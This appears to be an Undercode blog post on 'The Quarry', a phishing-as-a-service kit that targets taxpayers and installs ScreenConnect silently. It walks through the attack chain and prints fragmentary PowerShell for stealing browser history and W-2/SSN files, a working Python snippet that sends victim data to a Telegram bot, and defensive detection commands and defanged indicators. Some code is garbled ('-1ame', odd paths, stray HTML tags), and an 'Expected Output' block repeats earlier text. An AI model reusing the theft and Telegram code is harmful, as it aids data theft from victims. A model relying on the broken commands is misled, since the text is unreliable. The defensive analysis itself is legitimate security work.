Listen to this Post
Introduction:
A single developer operating under the alias RockyBelling has built and sold a Phishing-as-a-Service (PhaaS) toolkit to nearly 200 affiliates, enabling a wave of highly evasive IRS and Social Security Administration (SSA) phishing campaigns since at least April 2025. Dubbed “The Quarry” by SOCRadar threat researchers, this operation functions as a managed cybercrime service that equips even novice criminals with phishing pages, traffic-cloaking infrastructure, remote access panels, bulk email tools, and post-exploitation scripts. By weaponizing legitimate remote monitoring and management (RMM) software—primarily ConnectWise ScreenConnect—as its final payload, The Quarry bypasses traditional signature-based detection while granting attackers persistent remote access to victim machines.
Learning Objectives:
- Understand the complete attack chain of The Quarry PhaaS ecosystem, from bulk email distribution to post-exploitation data exfiltration
- Master detection and mitigation techniques for phishing campaigns that leverage legitimate RMM tools and traffic cloaking services
- Learn to implement behavioral monitoring, application control policies, and infrastructure-level defenses against evasive phishing operations
You Should Know:
- The Quarry Attack Chain: From Tax Lure to Full Remote Access
The Quarry executes a sophisticated multi-phased attack chain that begins with bulk email distribution using specialized mailing tools to deliver tax-themed lures. These emails impersonate the IRS, Social Security Administration, Adobe, Microsoft, DocuSign, and Dropbox, with US tax season being the most heavily exploited window.
When a victim clicks the malicious link, the server immediately performs a browser fingerprinting check. It redirects non-Windows devices and likely web crawlers to harmless error pages, ensuring only viable desktop targets reach the final payload staging area. A second layer uses Adspect, a commercial traffic cloaking service, to block automated sandboxes, virtual graphics cards, and security crawlers by analyzing WebGL, timezone adjustments, touch events, and other telemetry data.
Once a target passes these checks, they are presented with lure pages that perfectly replicate government portals, prompting victims to download a fake “Security Connector” tool. The real payload—a ScreenConnect MSI installer—downloads silently through a hidden webpage frame. In April 2026, the developer released an additional delivery path: a VBS dropper with UAC bypass sent via email that installs ScreenConnect silently while opening a decoy PDF to distract the victim.
Step-by-Step Attack Execution:
- Step 1: Affiliate purchases the toolkit ($500 entry-level, ~$2,000 for fully provisioned setup with monthly maintenance fee)
- Step 2: Bulk emails distributed using “Rocky Gmail Sender” mass-mailing tool
- Step 3: Victim clicks link → server checks User-Agent (blocks non-Windows)
- Step 4: Adspect cloaking performs advanced browser fingerprinting (blocks researchers and sandboxes)
- Step 5: Legitimate-looking government portal page loads → prompts “Security Connector” download
- Step 6: ScreenConnect MSI installs silently via hidden iframe or VBS dropper with UAC bypass
- Step 7: Operator gains full remote access to victim machine
- Post-Exploitation: PowerShell Scripts, Telegram C2, and Data Exfiltration
Once ScreenConnect is installed, operators can deploy a suite of post-exploitation tools designed to extract high-value financial and corporate data. The operation uses Telegram as its command-and-control (C2) infrastructure, with each affiliate receiving victim notifications in real time through dedicated bots.
Key Post-Exploitation Capabilities:
Browser History Extraction:
Script that forcibly closes the browser to unlock its database,
extracts six months of browser history, and exfiltrates via Telegram
(Reverse-engineered from observed TTPs)
Get-ChildItem -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -ErrorAction SilentlyContinue | ForEach-Object {
Database unlocked after browser forced closure
History entries extracted and sent to Telegram bot
}
Source: SOCRadar analysis reveals scripts pull six months of browser history after forcibly closing the browser to unlock its database
W-2 Document Discovery:
Script that scans for W-2 tax documents targeting SSNs, employer records, and salary info
Get-ChildItem -Path "C:\Users\Documents.pdf", "C:\Users\Desktop.pdf" -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Name -match "w2|w-2|tax|ssn|social" } |
ForEach-Object {
Exfiltrate via Telegram
}
Source: A second script scans victim files for W-2 tax documents, targeting Social Security numbers, employer records, and salary information
The developer’s Telegram channel (Rocky War Room, 194 subscribers) also promotes VioletRAT, a tool with credential dumping and cookie theft capabilities. Notably, AWS access keys have been found in campaign logs, harvested from public-facing JavaScript files belonging to targeted organizations.
Telegram Bot Integration for Real-Time Victim Telemetry:
Example of how Telegram bots are embedded in The Quarry infrastructure
(Based on observed TTPs from SOCRadar research)
import requests
TELEGRAM_BOT_TOKEN = "YOUR_BOT_TOKEN" Unique tokens embedded per affiliate
CHAT_ID = "YOUR_CHAT_ID"
def send_victim_notification(victim_data):
message = f"""
🎯 NEW VICTIM:
IP: {victim_data['ip']}
Location: {victim_data['geo']}
Browser: {victim_data['user_agent']}
ScreenConnect ID: {victim_data['sc_id']}
"""
url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
requests.post(url, json={"chat_id": CHAT_ID, "text": message})
Source: Over 90% of victims observed are located in the United States, with 500+ distinct victim IP addresses identified across 14 countries
3. Living-off-the-Land Tactics and RMM Abuse
What makes The Quarry especially dangerous is its strict adherence to Living-off-the-Land (LotL) tactical configurations. Instead of deploying basic malware payloads that would immediately trigger signature alerts on modern EDR platforms, the framework implements legitimate RMM software as its final payload.
Why RMM Abuse Is So Effective:
- ConnectWise ScreenConnect is a legitimate remote access tool trusted by IT departments worldwide
- Silent installation via MSI with hidden command-line parameters evades traditional detection
- Post-exploitation activities blend with legitimate administrative traffic
- No malware signatures to hash-block or signature-detect
Detection Commands for Security Teams:
Windows – Detect Silent ScreenConnect Installations:
Check for ScreenConnect MSI installations from temp directories
Get-WinEvent -LogName Application | Where-Object { $<em>.Message -match "ScreenConnect" -and $</em>.Message -match "MSI" }
Monitor for ScreenConnect service installations
Get-Service | Where-Object { $<em>.DisplayName -match "ScreenConnect" -or $</em>.DisplayName -match "ConnectWise" }
Check for ScreenConnect processes
Get-Process | Where-Object { $<em>.ProcessName -match "ScreenConnect" -or $</em>.ProcessName -match "ConnectWise" }
Linux – Monitor for Unauthorized RMM Tools:
Check for ScreenConnect client installations find / -1ame "ScreenConnect" -type f 2>/dev/null Monitor for unexpected remote access processes ps aux | grep -E "screenconnect|connectwise|rmm|remote" Audit listening ports for unauthorized RMM services ss -tulpn | grep -E "8040|8041|443" Common ScreenConnect ports
Network-Level Detection:
Block traffic to newly registered domains combining fiscal terms Example domain patterns to block: tax-portal, ssa-sync, irs-verification Implement in firewall or proxy: iptables -A OUTPUT -d .tax-portal.com -j DROP iptables -A OUTPUT -d .ssa-sync.net -j DROP
4. Infrastructure Patterns and Indicators of Compromise
SOCRadar’s investigation identified more than 80 domains, 40+ ScreenConnect panels, and 500+ distinct victim IP addresses across 14 countries during the research window (April 2025 through April 2026). The operation uses URL-fragment randomization and changes download directories with each visit, complicating automated analysis and stymying static blocklisting efforts.
Key Infrastructure Characteristics:
- Domains registered with fiscal terms combined with action words (e.g., “tax-portal,” “ssa-verify,” “irs-sync”)
- Self-hosted ScreenConnect panels provisioned uniquely for each affiliate
- Adspect cloaking service integration for traffic filtering
- GitLab account associated with RockyBelling containing embedded Telegram bot tokens
Indicators of Compromise (Defanged):
Domains (defanged - replace [.] with . for analysis in controlled environments) tax-portal[.]com ssa-verify[.]net irs-sync[.]org docusign-secure[.]info IP Ranges (indicative patterns) 198.51.100.0/24 203.0.113.0/24 File Hashes (indicative patterns - always verify against threat intel platforms) VBS Dropper (April 2026 release): [Hash Pattern] ScreenConnect MSI Installer: [Hash Pattern]
Source: IP addresses and domains are intentionally defanged to prevent accidental resolution
5. Defensive Recommendations and Mitigation Strategies
Defending against The Quarry requires organizations to look beyond traditional file hashes and focus on behavioral anomalies. The toolkit’s modular design and use of legitimate RMM software make standard signature-based detection highly ineffective.
Essential Defense Layers:
Application Control Policies:
Windows - Restrict VBS execution from user-writable directories Implement via AppLocker or Windows Defender Application Control Block script execution from: %USERPROFILE%\, C:\Users\ PowerShell - Log script block execution for monitoring Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -1ame "EnableScriptBlockLogging" -Value 1
RMM Tool Allowlisting:
- Maintain an approved list of RMM tools across the corporate network
- Trigger immediate alerts for unauthorized ScreenConnect or Datto installations
- Monitor endpoint logs for silent MSI installations from temporary directories using hidden command-line parameters
Network Filtering:
Block traffic to newly registered domains combining fiscal terms Implement in firewall or proxy with regular updates Example using iptables with domain blacklist: while read domain; do iptables -A OUTPUT -d $domain -j DROP done < domain_blacklist.txt DNS sinkhole for suspicious domains Configure DNS server to resolve known malicious domains to 0.0.0.0
Endpoint Monitoring Commands:
Windows - Monitor for unauthorized ScreenConnect installations
Get-ChildItem -Path "C:\Program Files\ScreenConnect" -ErrorAction SilentlyContinue
Get-ChildItem -Path "C:\Program Files (x86)\ScreenConnect" -ErrorAction SilentlyContinue
Check for ScreenConnect registry entries
Get-ChildItem -Path "HKLM:\SOFTWARE\ScreenConnect" -ErrorAction SilentlyContinue
Get-ChildItem -Path "HKLM:\SOFTWARE\WOW6432Node\ScreenConnect" -ErrorAction SilentlyContinue
Monitor for VBS dropper execution
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object { $<em>.Message -match "VBScript" -and $</em>.Message -match "cscript" }
Cloud Credential Auditing:
Audit external-facing web properties for exposed credentials Use tools like truffleHog or git-secrets trufflehog --regex --entropy=True https://example.com Monitor for AWS keys in JavaScript files grep -r "AKIA" /var/www/html/ 2>/dev/null
What Undercode Say:
- The Democratization of Cybercrime: The Quarry demonstrates how PhaaS platforms have effectively lowered the barrier to entry for cybercriminals, enabling nearly 200 affiliates with varying skill levels to launch sophisticated, evasive campaigns using a single developer’s toolkit. This commoditization of cybercrime tools represents a fundamental shift in the threat landscape.
-
The RMM Blind Spot: By weaponizing legitimate remote monitoring software, attackers exploit a critical blind spot in most security programs. Organizations must rethink their approach to endpoint security, moving beyond signature-based detection to behavioral monitoring and strict application control policies that scrutinize even “trusted” software installations.
-
Telegram as C2 Infrastructure: The extensive use of Telegram for victim notifications, affiliate coordination, and tool distribution highlights how legitimate communication platforms are being repurposed for malicious operations. Security teams should monitor for unusual Telegram traffic patterns and embedded bot tokens within their environments.
-
The IAB Connection: Evidence points to potential Initial Access Broker (IAB) activity, with stolen credentials and access possibly being resold to ransomware groups. This elevates The Quarry from a phishing operation to a critical supply chain risk for ransomware attacks, as compromised credentials can be weaponized by more destructive threat actors.
Expected Output:
Introduction:
A single developer operating under the alias RockyBelling has built and sold a Phishing-as-a-Service (PhaaS) toolkit to nearly 200 affiliates, enabling a wave of highly evasive IRS and Social Security Administration (SSA) phishing campaigns since at least April 2025. Dubbed “The Quarry” by SOCRadar threat researchers, this operation functions as a managed cybercrime service that equips even novice criminals with phishing pages, traffic-cloaking infrastructure, remote access panels, bulk email tools, and post-exploitation scripts. By weaponizing legitimate remote monitoring and management (RMM) software—primarily ConnectWise ScreenConnect—as its final payload, The Quarry bypasses traditional signature-based detection while granting attackers persistent remote access to victim machines.
What Undercode Say:
- The Democratization of Cybercrime: The Quarry demonstrates how PhaaS platforms have effectively lowered the barrier to entry for cybercriminals, enabling nearly 200 affiliates with varying skill levels to launch sophisticated, evasive campaigns using a single developer’s toolkit. This commoditization of cybercrime tools represents a fundamental shift in the threat landscape.
- The RMM Blind Spot: By weaponizing legitimate remote monitoring software, attackers exploit a critical blind spot in most security programs. Organizations must rethink their approach to endpoint security, moving beyond signature-based detection to behavioral monitoring and strict application control policies that scrutinize even “trusted” software installations.
Prediction:
- -1 The Quarry’s success will likely inspire copycat PhaaS operations targeting other government agencies and financial institutions, expanding the threat beyond US tax season to year-round global campaigns.
- -1 The integration of IAB services with PhaaS platforms will accelerate ransomware attacks, as stolen credentials from phishing campaigns become a primary attack vector for more destructive threat actors.
- -1 Increased scrutiny and blocking of RMM tools by security vendors may drive attackers to adapt by weaponizing additional legitimate remote access software, creating an escalating arms race.
- -P Defensive innovations driven by this threat—such as behavioral monitoring, application control policies, and traffic analysis—will ultimately strengthen organizational security postures against a wider range of evasive attacks.
- -1 The use of Telegram as C2 infrastructure will continue to grow, complicating law enforcement efforts to disrupt cybercriminal operations that leverage legitimate communication platforms.
- -1 Regulatory bodies may impose stricter requirements on RMM software vendors to implement anti-abuse measures, potentially increasing compliance burdens for legitimate users.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Varshu25 Cybercriminals – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
